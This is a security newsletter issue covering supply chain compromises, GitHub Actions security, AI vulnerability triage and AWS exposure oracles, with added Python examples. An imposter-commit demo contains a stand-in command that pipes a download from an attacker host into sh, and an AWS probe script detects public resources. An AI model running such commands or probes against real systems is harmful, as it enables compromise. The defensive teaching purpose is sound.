[tl;dr sec] #322 - GitHub's Supply Chain Roadmap, Scaling Vulnerability Management with AI, Finding Vulnerabilities Across Repos
GitHub's plan to harden GitHub Actions and supply chain security, automating and scaling SAST and SCA vuln management, OSS tool that uses AI agents to reason about vulns across repos
Hey there,
I hope you’ve been doing well!
🫶 Long Career, Long Friendships
This week I was reflecting a bit after BSidesSF and RSAC about how careers are long.
I remember attending conferences when I first started in security and being intimidated by how it was crowded and full of strangers.
This year, there were still many strangers not yet friends, but now I got to catch up with many former colleagues and friends I’ve known for years. Some for a decade 👴
It feels nice knowing we’re all working together in our own ways, at different companies, to make the world a little bit safer.
Also, just wanted to share a few thoughts:
It’s OK if you don’t know people at an event or conference. 98% of the time if you go up and chat with a stranger it goes great, or at least fine.
When I’m nervous at events, I like to think about how, just by both of us being at a security event, I have a vast amount of shared experience and context with anyone there.
If at every event you just meet a handful of people, that compounds event on event, year on year. Soon you’ll likely know at least a few people at most events.
Anywho, if you attended, I hope you had a great time and made some friends, and didn’t just repeat “AI” until a VC materialized and dumped money on you.
P.S. Dan Guido kindly turned his [un]prompted talk into a tl;dr sec guest post. It’s excellent, highly recommend.
👉️ How we made Trail of Bits AI-native (so far) 👈️
Sponsor
📣 Free tool: instant visibility into your Claude Desktop deployment
Employees aren't waiting for approval. Claude Desktop is getting deployed with MCP servers, OAuth connectors, CoWork scheduled tasks, and browser-control extensions your security team never reviewed.
Our Head of Security, Ed Merrett, built a lightweight, read-only audit tool to give you instant visibility. One command surfaces everything: installed extensions and whether they're signed, MCP server configs, dangling env variables, OAuth tokens, scheduled tasks, org-deployed plugins, and runtime state.
p.s. If you’re looking for more help with securing the Claude ecosystem, visit harmonic.security to check out our other free resources!
This is great! A free GitHub repo tool that gives you visibility into MCP servers, extensions, plugins, connectors, scheduled tasks, and permissions. Love it 👌
AppSec
portswigger/ip-rotate
By PortSwigger: a Burp Suite extension that routes each request through AWS API Gateway so it arrives from a different IP, helping bypass IP-based rate limiting, brute-force protections, and WAF blocks.
Passkeys are Your New Best Friend
Google's Harsh Lal explains how passkeys use asymmetric cryptography to replace passwords: a private key stored on your device signs the server's authentication challenge, and the public key registered with the server verifies the signature. Because the credential is bound to the site's domain it can't be used on a lookalike phishing site, and because the server only holds the public key, a server breach yields nothing an attacker can log in with. Nice brief overview of why passkeys are safer than passwords, signing in across devices, an FAQ of security concerns, and the residual risks: sync account hijacking (mitigated by requiring the old device's screen lock) and social engineering attacks that require physical proximity.
A year of open source vulnerability trends: CVEs, advisories, and malware
GitHub's Jonathan Evans analyzes the 4,101 reviewed advisories GitHub published in 2025, the fewest since 2021. This reflects a reduction in backfilling older vulnerabilities rather than fewer new discoveries; newly reported vulnerabilities actually increased 19% year-over-year. The data shows cross-site scripting remains the top vulnerability type, while resource exhaustion, unsafe deserialization, and SSRF saw significant increases. Advisories without any CWE dropped 85% due to improved tagging. GitHub's malware advisory publications surged 69% to 7,197 (driven by campaigns like SHA1-Hulud). The GitHub CNA published 35% more CVE records (2,903 total), with 679 new organizations requesting CVE IDs. “We saw 10 to 16% growth every quarter. If this trend continues, GitHub will publish over 50% more CVEs in 2026.”
💡 Frontier models are getting so much better at finding vulnerabilities + much more code is being written → 2026 is for sure going to be a record breaking year for CVEs, the only question is by how much. People are (in my opinion, correctly) talking about an upcoming “vulnpocalypse." 😅
Sponsor
📣 Webinar: Executive Impersonation and Modern Phishing Tactics
Executive impersonation attacks pressure employees with urgency, authority, and high-stakes requests. Because they rely on social engineering instead of obvious malware, they often slip past traditional email defenses. Join Sublime Security for a live webinar on April 8 to break down how these attacks work, review real-world patterns, and learn practical ways security teams can detect and stop impersonation attempts earlier.
👉 Register 👈
Andrew Becherer is a sharp dude, and gave an excellent talk at the Decibel event Daniel Miessler and I co-hosted during RSA. He definitely has perspective worth listening to.
Cloud Security
Reunifying the Cloud: Introducing Aurelian for Multi-Cloud Security Testing
Praetorian's Aarushi Dwivedi et al. have released Aurelian, an open-source Go-based multi-cloud security framework that unifies reconnaissance, secrets discovery, and IAM analysis across AWS, Azure, and GCP. Aurelian evaluates resource policies using real IAM policy evaluation logic (not just flag checks), integrates with Titus for secrets scanning with live credential validation via API calls, and maps privilege escalation paths into Neo4j for Cypher-based querying of multi-hop attack chains.
Don’t expose yourself in public - let AWS error messages do it for you
Plerion’s Daniel Grzelak describes how AWS’s recently rolled-out, more descriptive IAM error messages inadvertently created a simple oracle for detecting publicly exposed resources: from an account you control, assume a role with a deny-all session policy, make a request against the target resource, and read the AccessDenied message. If it says "explicit deny in a session policy," the only thing that blocked you was your own session policy, meaning the target's resource policy would have allowed the request, which confirms the exposure.
💡 The contents of my friend Daniel's posts have great security advice, and the titles have good life advice.
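An added example (mine, not Plerion's code) of the probing logic: the deny-all session policy, the assume-role call that applies it, and a classifier for the resulting AccessDenied message. It assumes you probe from an account that is not the target's (that is what "public" means here), that the message wording quoted in the post is stable across services, and that the sample error strings are constructed for illustration rather than captured from AWS.

```python
import json
from typing import Callable

# Session policy that denies everything. When the target's resource-based
# policy lets an outside principal in, the only thing left to block the call
# is this explicit deny, and the new-style error text names it.
DENY_ALL_SESSION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*"}],
}

# Phrase quoted in the post; assumed to stay stable.
SESSION_DENY_MARKER = "explicit deny in a session policy"


def assume_probe_session(role_arn: str, session_name: str = "exposure-probe"):
    """Assume a role in your own account with the deny-all session policy and
    return a boto3 Session whose every call is doomed to fail. boto3 is
    imported here so the rest of the module runs without it."""
    import boto3
    sts = boto3.client("sts")
    creds = sts.assume_role(
        RoleArn=role_arn,
        RoleSessionName=session_name,
        Policy=json.dumps(DENY_ALL_SESSION_POLICY),
    )["Credentials"]
    return boto3.Session(
        aws_access_key_id=creds["AccessKeyId"],
        aws_secret_access_key=creds["SecretAccessKey"],
        aws_session_token=creds["SessionToken"],
    )


def classify_denial(message: str) -> str:
    """What an AccessDenied message from a deny-all session reveals."""
    if SESSION_DENY_MARKER in message:
        # Our own session policy was the blocker, so the resource policy had
        # already admitted an external principal: the resource is exposed.
        return "exposed"
    return "not-allowed"


def probe(request: Callable[[], object]) -> str:
    """Run one API call made with the probe session and classify the result.
    `request` is a zero-arg callable, e.g.
    lambda: session.client("s3").get_object(Bucket=b, Key=k)."""
    try:
        request()
    except Exception as exc:  # botocore ClientError in practice; str() carries the message
        return classify_denial(str(exc))
    return "unexpected-success"  # impossible under deny-all; investigate


if __name__ == "__main__":
    # Constructed messages shaped like the new-style errors, not real captures.
    exposed = ('User: arn:aws:sts::111122223333:assumed-role/probe/exposure-probe '
               'is not authorized to perform: s3:GetObject on resource: '
               '"arn:aws:s3:::target-bucket/x" with an explicit deny in a session policy')
    closed = ('User: ... is not authorized to perform: s3:GetObject on resource: '
              '"arn:aws:s3:::target-bucket/x" because no resource-based policy '
              'allows the s3:GetObject action')
    for msg in (exposed, closed):
        print(classify_denial(msg))  # exposed, not-allowed
```

Two things to keep in mind when using it: the probe is a real API call, so it lands in the target account's CloudTrail as an AccessDenied from your principal, and the oracle only tells you the resource policy admits *your* principal. A policy that names your account specifically would answer "exposed" too, so to test for "public" you want to probe from an account the target has no reason to trust.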
Supply Chain
TeamPCP Supply Chain Campaign
Nice round-up landing page by Rami McCarthy.
TeamPCP Supply Chain Campaign: A March 2026 Retrospective
Great overview by OpenSourceMalware’s Jenn Gile on how TeamPCP executed a cascading multi-phase supply chain attack in March 2026, leveraging a single unrevoked credential stolen from Trivy's CI pipeline to compromise a chain of projects and ecosystems (Aqua Security, npm, LiteLLM/PyPI, Checkmarx, and Telnyx), harvesting CI/CD secrets at each stage to fuel the next, while also deploying a geotargeted filesystem wiper against Iranian infrastructure.
💡 I met Jenn at the tl;dr sec community event before BSidesSF, she seems super sharp and nice 🙂
Supply Chain Attack on Axios Pulls Malicious Dependency from npm
Socket describes a supply chain attack that compromised Axios, one of the most widely used HTTP clients in the JavaScript ecosystem (~100M weekly downloads), by injecting the malicious dependency [email protected], which was published minutes before the poisoned Axios releases. The release appeared outside the normal Axios workflow, only two malicious versions were published, and only one line was added to package.json (the malicious dependency); small, targeted changes are less likely to raise suspicion.
💡 *Takes a long drag from my cigarette* Another day, another NPM compromise.
The Comforting Lie Of SHA Pinning
Aiden Vaines describes a subtlety of how GitHub scopes commit SHAs when you pin a GitHub Action to one. GitHub serves commits from every fork in a repository's network under the parent repository's URL, so a commit that only exists in an attacker's fork still resolves as if it belonged to the original repo. Concretely: if your repo uses the GitHub Action avaines/gh_action@<SHA>, and an attacker forks that action, adds malicious code, and submits a PR to your repo that only changes the Action’s SHA reference, the diff shows avaines/gh_action@<BAD_SHA> (same owner/repo name, only the SHA has changed, even though that commit came from a different GitHub user). “The result is that a pull request can replace a pinned, trusted action with attacker-controlled code without changing the apparent repository reference.”
Chainguard’s Billy Lynch wrote about this in 2023: What the fork? Imposter commits in GitHub Actions and CI/CD. Great write-up.
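As an added example (mine, not code from either post) of the check these writeups imply: a commit pinned as owner/repo@SHA should be reachable from a branch or tag of the real upstream repository, and merely existing as an object is not enough. It shells out to git, so it assumes git is installed; the repositories and the "malicious" commit are built in a temp directory purely to show the two outcomes, and the object's presence in the upstream clone is modelled by fetching the fork's commit into it, since that is the situation GitHub's fork network creates.

```python
import subprocess
import tempfile
from pathlib import Path

# Identity for the throwaway commits this demo makes; irrelevant to the check.
GIT_ID = ["-c", "user.name=demo", "-c", "user.email=demo@example.com"]


def git(repo, *args, check=True) -> subprocess.CompletedProcess:
    """Run git inside `repo`, capturing output."""
    return subprocess.run(["git", *GIT_ID, "-C", str(repo), *args],
                          capture_output=True, text=True, check=check)


def object_present(clone, sha: str) -> bool:
    """Does the object exist at all? On GitHub this is true for every commit
    in the fork network, which is exactly why presence proves nothing."""
    return git(clone, "cat-file", "-e", sha, check=False).returncode == 0


def sha_in_upstream(clone, sha: str) -> bool:
    """True iff `sha` is an ancestor of (or equal to) some branch or tag tip
    of a clone made from the upstream URL. Fork-only commits fail for every tip."""
    tips = git(clone, "for-each-ref", "--format=%(objectname)",
               "refs/heads", "refs/tags").stdout.split()
    return any(git(clone, "merge-base", "--is-ancestor", sha, tip,
                   check=False).returncode == 0 for tip in tips)


def demo() -> dict:
    """Build a toy upstream and a fork with one extra malicious commit, pull
    that commit's object into the upstream clone (as GitHub's fork network
    effectively does), and report what each check says."""
    work = Path(tempfile.mkdtemp())
    upstream, fork = work / "upstream", work / "fork"
    subprocess.run(["git", *GIT_ID, "init", "-q", str(upstream)],
                   capture_output=True, check=True)
    (upstream / "action.sh").write_text("echo hello from the real action\n")
    git(upstream, "add", "action.sh")
    git(upstream, "commit", "-q", "-m", "release v1")
    good = git(upstream, "rev-parse", "HEAD").stdout.strip()

    subprocess.run(["git", *GIT_ID, "clone", "-q", str(upstream), str(fork)],
                   capture_output=True, check=True)
    with open(fork / "action.sh", "a") as f:
        f.write("curl -s https://attacker.example/p | sh\n")  # constructed payload
    git(fork, "commit", "-q", "-am", "chore: tidy up")
    bad = git(fork, "rev-parse", "HEAD").stdout.strip()
    # The object lands in the upstream clone, but no upstream ref reaches it.
    git(upstream, "fetch", "-q", str(fork), "HEAD")

    return {
        "good_reachable": sha_in_upstream(upstream, good),
        "bad_present": object_present(upstream, bad),
        "bad_reachable": sha_in_upstream(upstream, bad),
    }


if __name__ == "__main__":
    print(demo())  # {'good_reachable': True, 'bad_present': True, 'bad_reachable': False}
```

In practice you clone the upstream URL you expect (not whatever the PR points at) and run sha_in_upstream on the SHA from the diff; a False result when object_present is True is the imposter case. Reachability does not replace reading the commit, since a legitimate upstream commit on an abandoned branch would also pass.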
Securing the open source supply chain across GitHub
GitHub's Zachary Steindler discusses prevention steps you can take today, plus a look at the security capabilities GitHub is working on. He recommends enabling CodeQL to scan Actions workflows for security issues, avoiding pull_request_target triggers, pinning third-party Actions to full commit SHAs, and using OpenID Connect tokens with trusted publishing instead of secrets. GitHub scans all 30,000+ daily npm package publishes for malware and is accelerating their Actions security roadmap in response to attacks like Shai-Hulud, while working with OpenSSF to expand trusted publishing support across npm, PyPI, NuGet, RubyGems, and Crates.
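An added example of a lint for two of the workflow-level items above: third-party actions not pinned to a full commit SHA, and the pull_request_target trigger. It is my code, not GitHub's CodeQL queries; it reads the YAML line by line with regular expressions instead of a YAML parser, so it is a heuristic, and SAMPLE_WORKFLOW together with its 40-hex SHA is a constructed placeholder.

```python
import re

# "uses:" lines, with or without a leading list dash; captures the reference.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
# A full commit SHA: 40 lowercase hex characters, nothing else.
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# pull_request_target as a trigger key, a list item, or inside `on: [...]`.
PRT_RE = re.compile(
    r"^\s*(-\s*)?pull_request_target\s*(:.*)?$|^\s*on:.*\bpull_request_target\b"
)


def lint_workflow(text: str) -> list:
    """Return human-readable findings, one per offending line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if PRT_RE.match(line):
            findings.append(
                f"L{n}: pull_request_target trigger: runs in the base repo with "
                f"access to secrets and (by default) a write token, on a fork's PR"
            )
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue  # local action or container image: no git ref to pin
        _target, _, version = ref.partition("@")
        if not version:
            findings.append(f"L{n}: {ref} has no ref at all (follows the default branch)")
        elif not SHA_RE.match(version):
            findings.append(f"L{n}: {ref} is pinned to mutable ref {version!r}, not a commit SHA")
    return findings


# Constructed sample; the 40-hex string is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-helper
      - uses: some-org/some-action
"""

if __name__ == "__main__":
    for finding in lint_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

A passing lint means the reference is syntactically a commit SHA, not that the SHA is a commit of the repo named before the @, and not that pull_request_target is never justified (it is the standard way to label or comment on fork PRs, as long as the job never checks out and runs the PR's code). Dependabot can keep SHA pins updated so that pinning does not freeze you on old versions.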
What's coming to our GitHub Actions 2026 security roadmap
GitHub's Greg Ose describes their 2026 roadmap to secure GitHub Actions against supply chain attacks through: introducing workflow-level dependency locking (similar to Go's go.mod/go.sum) that pins all direct and transitive dependencies with commit SHAs (future: immutable releases), implementing policy-driven execution protections via rulesets that control who can trigger workflows and which events are allowed (with evaluate mode for safe rollout), and adding scoped secrets that bind credentials to specific repositories, branches, environments, or trusted reusable workflows.
GitHub is also building the Actions Data Stream for near real-time execution telemetry to S3/Azure Event Hub and a native Layer 7 egress firewall for GitHub-hosted runners that operates outside the runner VM with monitor and enforce modes, treating CI/CD infrastructure as critical infrastructure with enforceable network boundaries.
💡 These seem like excellent, thoughtful improvements. Love the push towards better visibility, security controls, and secure by default. Hats off to the GitHub team for these initiatives. Unfortunately the timeline is 3-6 months, though I’d rather them build it right than poorly.
Red Team
googleprojectzero/Jackalope
Binary, coverage-guided fuzzer for Windows, macOS, Linux and Android. Built on TinyInst for binary instrumentation, supports both file and shared memory sample delivery.
On the Effectiveness of Mutational Grammar Fuzzing
Mutational grammar fuzzing is a type of fuzzing that uses a predefined grammar to describe the structure of the samples (e.g. an input string or file), so that when a sample is mutated the resulting samples still adhere to the grammar rules. Google Project Zero’s Ivan Fratric describes two key flaws in mutational coverage-guided grammar fuzzing: 1) more coverage doesn’t mean more bugs; you need to test the right code patterns (e.g. functions need to be called in a certain order, or the result of one function is used as an input to another), and 2) mutational fuzzing produces highly similar samples, due to its greedy habit of saving slightly-modified samples that trigger new coverage.
To address these issues, Ivan proposes a technique in Jackalope where the fuzzing worker spends half of the time creating a fully independent corpus generated from scratch and half of the time working on a larger corpus that also incorporates interesting samples (as measured by the coverage) from previous workers.
It's More Than Saying No
Zoom’s Head of Assurance Andy Grant describes what to do when leadership asks your offensive security team to do work it was never designed for. Andy argues that offensive security teams lose effectiveness when they accept misaligned work like QA support, rushed pentests, or control validation, which disrupts the long exploration periods needed for discovering unknown unknowns through intuition-driven research.
Rather than saying no to requests, proactively engage with leadership to anticipate concerns, start investigating before formal requests arrive, and reframe incoming work to align with the team's adversarial research model, for example, reframing "can you test X before release?" into deeper investigations of trust boundaries and systemic risk.
AI + Security
[un]prompted 2026 YouTube Playlist
The talk recordings have (mostly) been published. 65 talks at the forefront of AI + security. The final 9 will be uploaded soon.
RSA 2026 Startup Landscape
Jake Epstein mapped every cybersecurity startup at RSAC 2026 (322 companies) into 18 categories, including Agent Security / Non Human Identity, developer security, AI SOC, AI pen testing, data pipelines, human risk, and more. Neat visualization.
VulnVibes: Building an AI Agent That Reasons Across Microservices to Find Real Vulnerabilities
Anshuman Bhartiya announces VulnVibes, an AI-powered agent that analyzes Pull Requests for vulnerabilities by reasoning across multiple repositories in an organization, which is useful in microservice architectures. It searches across your entire GitHub organization to understand your architecture, verify what security controls actually exist, and determine if a suspicious code change is a real vulnerability. VulnVibes works in two stages: first threat modeling the PR diff to identify security-relevant changes, then performing cross-repo investigation by reading infrastructure configs (Docker Compose, nginx), checking for security controls, and following vulnerability-specific investigation playbooks.
Anshuman walks through running VulnVibes against microvibes-lab (a test org with auth-service, doc-api, frontend-app, and infra-ops repos), in which it correctly identified an SSRF vulnerability by tracing the attack path across three repos to confirm a flat Docker network and lack of WAF protection, made a nuanced call that a permissive CORS config was a false positive after verifying the codebase only uses header-based auth, and appropriately ignored a safe JWT refactoring.
💡 Being able to reason about the impact and relevance of a potential vulnerability across multiple repos is super cool, and very relevant in complex environments. I expect to see more work in this space, neat that Anshuman has open sourced his prototype 🫡
Scaling Vulnerability Management with AI: What Actually Worked
Synthesia’s Gianluca Brindisi describes how they built an AI-powered vulnerability management system that auto-triages SAST and SCA findings using layered automation: severity-based filtering, Semgrep Assistant for false positive detection, and EPSS/reachability analysis for supply chain issues. They automatically turn remaining high severity findings into GitHub issues with structured context (links to code, Semgrep analysis, severity, and the triggering rule), and then spin up three independent coding agents via GitHub workflows to validate vulnerabilities through consensus voting, then automatically generate fix PRs for confirmed true positives.
They reduced their backlog by 60% initially through archiving stale repos, and now the system processes the remaining findings with minimal human intervention: only 11% of findings require manual security review. For confirmed true positives, the true-positive label triggers an agent to create a branch, implement a secure fix, and open a pull request. “The PR enters the repo's normal review flow. Instead of starting from a security ticket and a blank editor, the developer now reviews a proposed fix with the vulnerability context already embedded.”
💡 This is great security engineering 👌 I love the focus on thoughtfully prioritizing/risk rating repos and findings, benchmarking and evaluating the AI workflow steps, and automating parts of the triage and PRs fixing the code. Neat!
HQ1995/vibe-security-radar
Georgia Tech SSLab’s Hanqing Zhao has built Vibe Security Radar, a tool that scans public CVE databases (OSV, GitHub Advisory Database, NVD) to identify vulnerabilities introduced by AI-generated code: it traces fix commits back through git blame, detects AI tool signatures (co-author trailers, bot emails, commit message markers from 15+ tools), and verifies causality with an LLM investigator. So far: 74 AI-linked CVEs, 39 Critical / High, ~44K advisories scanned.
💡 I think there's actually a lot of nuance around measuring the security of LLM-generated code. For example:
Was the developer using any security-related prompts, context, or tooling?
The model may have written more secure code if it was asked, but it wasn't.
Bug density - If humans ship bugs at, say, 2 per 1,000 LOC and LLMs are twice as good (1 bug per 1K LOC), but LLMs are now writing 10X as much code, that still ends up introducing more bugs.
If LLMs write fewer bugs than humans, should we prefer using them, even if they still introduce bugs? (e.g. Does Waymo need to be safer than human drivers or never make mistakes?)
Misc
Claude Code source map leak
Anthropic shipped a source map file in the Claude Code npm package, exposing the full unobfuscated TypeScript source (~1,900 files, 512K+ lines). It’s also suspiciously close to April Fools Day 🤔 Maybe it’s real though? (Thariq tweet)
Claude Code Hidden Features - 89 feature flags, unreleased autonomous agents, companion pets, anti-distillation systems, and more — extracted from 1,809 source files.
instructkr/claw-code - Someone took the Claude Code leak, used Codex to port the core features to Python from scratch, and then ported it to Rust.
Theo’s video - I think he’s overly negative and I don’t agree with all his points, but it has some reasonable context.
Misc
Dissecting the Bars While Rapping - Harry Mack dissects what he’s doing in his rap (structurally, setting up rhymes), while rapping about it. Insane 🤯
404 Media - The company WebinarTV is secretly scanning the Internet for Zoom meeting links, recording the calls, and turning them into AI-generated podcasts for profit.
Can it Resolve DOOM? Game Engine in 2,000 DNS Records - As DNS TXT records can store arbitrary text, Adam Rice was able to compress and play DOOM from 1,966 TXT records on a single Cloudflare Pro DNS zone. 😂
Apple says no one using Lockdown Mode has been hacked with spyware in the four years since it’s been launched. This is impressive, and a great example of eliminating vulnerability classes/raising the security bar at scale 🤘
Gabor Mate to Hasan Minaj - Kids Speak Where It’s Safe 😭
Alex Hormozi - How to Win With AI in 2026
Good Work - Why fun tech jobs went extinct
7 months underwater on a nuclear submarine - Fascinating!
Politics / Privacy
Iran-linked hackers breach FBI director's personal email, publish photos and documents
Iran built a vast camera network to control dissent. Israel turned it into a targeting tool - Allegedly Israel hijacked Iran’s street cameras in order to successfully track and target Iran’s supreme leader. “Experts say advances in AI have allowed militaries to overcome a critical hurdle in weaponizing hacked footage: sifting through huge amounts of video to identify people, vehicles, and other targets.”
Using a VPN May Subject You to NSA Spying - Because VPNs obscure a user’s true location, and because intelligence agencies presume communications of unknown origin are foreign, that may give the NSA the authority to intercept the communication without a warrant.
EU Disinfo Lab - Disinfo Update 12/11/2025 - I haven’t come across this lab before so I’m not sure about the trustworthiness, but it has some interesting links around topics including: the X algorithm amplifying right-wing and extreme content, Meta’s profits being tied to scam ads, Russia recruiting fighters from other countries, Israel paying US influencers to boost its image, AI chatbots repeating Russian propaganda, and more.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!
Cheers,
Clint
P.S. Feel free to connect with me on LinkedIn 👋